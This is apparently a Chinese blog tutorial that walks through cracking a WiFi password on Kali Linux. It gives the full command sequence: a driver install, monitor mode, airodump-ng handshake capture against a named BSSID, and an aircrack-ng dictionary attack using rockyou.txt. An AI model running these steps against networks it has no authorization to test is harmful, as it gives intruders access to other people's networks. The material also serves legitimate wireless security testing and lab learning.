Kali Linux使用 airmon-ng 等相关命令爆破 Wifi 密码
首先我是在淘宝上买的免驱动的无线网卡,插上一般可以直接使用,不过买回来发现无法连接一些wifi,是wifi除了满格信号,就是没有信号黑色的。
我还以为这个wifi信号怎么这么差,联系客服发现是最新的kali需要安装一个软件包realtek-rtl8188eus-dkms
淘宝客服的教程:kali单频无线网卡驱动更新方法
使用apt
安装该软件包
sudo apt install linux-headers-686-pae (32位系统执行这个命令安装内核头文件,64位的系统不用执行,下面的命令会自动安装头文件)
sudo apt install realtek-rtl8188eus-dkms -y (32位与64位系统都要执行这条)
设置网卡为Monitor模式
安装后开始破解Wifi
密码
首先需要将无线网卡设置为Monitor
监听模式,因为airmon-ng
这个命令需要我们设置为这个模式
sudo ifconfig wlan0 down # 关闭wlan0网卡,这里可能不同的系统识别的名称不一样
sudo iwconfig wlan0 mode Monitor # 设置wlan0网卡为Monitor模式
sudo ifconfig wlan0 up # 开启wlan0网卡
如果上述设置Monitor
模式报错,可能是你的无线网卡不支持该模式,需要买一个支持的
关闭影响使用airmon-ng的进程
sudo airmon-ng check kill # 该步骤会将系统的网络管理器杀死
开启wlan0网卡的监听模式
sudo airmon-ng start wlan0
注意我这里的网卡名称为wlan1
开启该网卡的unspec
显示的内容会和我的类似
使用ariodump-ng检索wifi信息
sudo airodump-ng wlan1
这里有几个重要的结果,一会我们会使用到:
BSSID
: 代表这个无线网络的MAC
地址CH
: 代表这个无线网络使用的信道
ESSID
: 无线网络Wifi
的名称
使用ariodum-ng对指定的wifi进行抓包
sudo airodump-ng --bssid 9C:A6:15:FF:BB:C7 -c 6 wlan1 -w /home/junglezt/桌面/NetworkSecurity/
其中参数:
--bssid
: 就是我们获取到指定网络的MAC
地址-c
: 指定该网络的信道
-w
: 指定抓取该网络数据包存放的位置
在抓取过程中,使用任意一台设备连接到该wifi
,然后Ctrl + C
停止抓包即可
抓取成功,会在/home/junglezt/桌面/NetworkSecurity/
目录下生成一些文件,其中重要的是一个后缀名为cap
的文件
使用aircrack-ng爆破抓取cap数据包中wifi的密码
爆破就是使用一个含有很多密码的字典,不断的尝试来直到试出密码为止,这里使用的字典是kali
自带的/usr/share/wordlists/rockyou.txt
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/junglezt/桌面/NetworkSecurity/-01.cap
-w
指定字典,对/home/junglezt/桌面/NetworkSecurity/-01.cap
文件进行爆破
成功破解密码就会停止,这里我测试wifi
的密码为Admin123
,该密码在rockyou.txt
中含有
注意:能不能破解出密码,取决于你的字典中有没有含有目标wifi的密码,取决与你字典和机器的性能。
实验结束。